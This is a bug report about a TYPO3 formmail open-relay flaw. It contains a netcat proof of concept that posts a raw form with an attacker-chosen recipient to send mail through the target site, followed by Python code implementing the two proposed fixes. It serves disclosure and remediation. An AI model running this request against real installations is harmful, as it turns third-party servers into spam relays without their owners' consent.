Bug #14265
closedformmail can be abused to send spam
0%
Description
Getting typo3 to send emails to arbitrary email addresses is as easy as typing in
---------------------------------------------
# "localhost" stands for the target installation; fe_typo_user is a cookie that installation issued.
# The blank line after the headers is required, and Content-Length must match the body (91 bytes).
netcat -w 1 localhost 80 <<EOF
POST /index.php HTTP/1.1
Host: localhost
Referer: http://localhost/
Cookie: fe_typo_user=1bedf7ad7f
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

subject=&recipient=me%40privacy.net&locationData=13%3Att_content%3A14&name=&formtype_mail=1
EOF
---------------------------------------------
on the console. The recipient can be set completely arbitrarily!
[To reproduce, you have to replace "localhost" with an actual typo3 installation and get a cookie from the server.]
Insecure formmail installations are routinely exploited by spammers to send massive amounts of emails.
I see two ways to fix this: Calculate a sha1 hash of all hidden fields in the form and a secret string and use this in another hidden form field. On return of the form, check the sha1 hash.
Or (even better): Don't put the recipient email address in the form but fetch it from the database.
(issue imported from #M278)
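The two fixes proposed above, as an added illustration written for this page in Python (not TYPO3's PHP and not the project's code). The first signs the hidden fields with HMAC-SHA1 over a server-side secret instead of a bare sha1 of "fields + secret", because a plain hash of concatenated data is open to length extension while HMAC is not; the second ignores any `recipient` in the POST and looks the address up by `locationData`. `SERVER_SECRET`, `PROTECTED_FIELDS`, `FORM_RECIPIENTS` and the sample recipient address are assumptions made for the example; the attack body is the one from the report.

```python
import hmac
import hashlib
from urllib.parse import parse_qsl, urlencode

# Hypothetical installation secret (assumed name, not a TYPO3 configuration key).
# Generate it once per installation and never emit it in a template.
SERVER_SECRET = b"replace-with-a-long-random-installation-secret"

# Hidden fields the template emits and the mail handler must be able to trust (assumed list).
PROTECTED_FIELDS = ("recipient", "locationData", "formtype_mail")

# The POST body from the bug report (copied from the report, no signature field).
REPORTED_ATTACK_BODY = (
    "subject=&recipient=me%40privacy.net&locationData=13%3Att_content%3A14"
    "&name=&formtype_mail=1"
)


def sign_hidden_fields(fields):
    """HMAC-SHA1 over the protected hidden fields (fix 1, hardened)."""
    mac = hmac.new(SERVER_SECRET, digestmod=hashlib.sha1)
    # Canonical encoding: fixed field order and length-prefixed values, so that
    # recipient="ab"+locationData="c" cannot collide with "a"+"bc".
    for name in PROTECTED_FIELDS:
        value = fields.get(name, "").encode("utf-8")
        mac.update(name.encode("utf-8"))
        mac.update(len(value).to_bytes(4, "big"))
        mac.update(value)
    return mac.hexdigest()


def render_hidden_fields(recipient, location_data):
    """What the template would emit: the hidden fields plus their signature."""
    fields = {"recipient": recipient, "locationData": location_data, "formtype_mail": "1"}
    fields["sig"] = sign_hidden_fields(fields)
    return fields


def encode_form(fields):
    """application/x-www-form-urlencoded body, as a browser would send it."""
    return urlencode(fields)


def verify_submission(body):
    """Parse a POST body and check the signature.

    Returns the recipient to mail to, or None when the signature is missing,
    does not match, or no recipient was signed.
    """
    fields = dict(parse_qsl(body, keep_blank_values=True))
    expected = sign_hidden_fields(fields)
    # Constant-time comparison: an attacker must not learn the MAC byte by byte.
    if not hmac.compare_digest(expected, fields.get("sig", "")):
        return None
    return fields.get("recipient") or None


# --- Fix 2: keep the address out of the form entirely ------------------------

# Constructed stand-in for the content table: locationData -> recipient.
# Sample data for this example, not from a real installation.
FORM_RECIPIENTS = {
    "13:tt_content:14": "webmaster@example.org",
}


def resolve_recipient(body):
    """Look the recipient up by locationData; a 'recipient' field in the POST is ignored."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    return FORM_RECIPIENTS.get(fields.get("locationData", ""))


if __name__ == "__main__":
    legit = render_hidden_fields("webmaster@example.org", "13:tt_content:14")
    print("legit form  :", verify_submission(encode_form(legit)))
    tampered = dict(legit, recipient="me@privacy.net")  # attacker edits the hidden field
    print("tampered    :", verify_submission(encode_form(tampered)))
    print("reported PoC:", verify_submission(REPORTED_ATTACK_BODY))
    print("lookup      :", resolve_recipient(REPORTED_ATTACK_BODY))
```

With the signature in place the PoC body fails verification because it carries no `sig`, and editing `recipient` in a genuine form invalidates the MAC; with the lookup, the attacker's `recipient` is simply never read, which is why the report calls that the better fix.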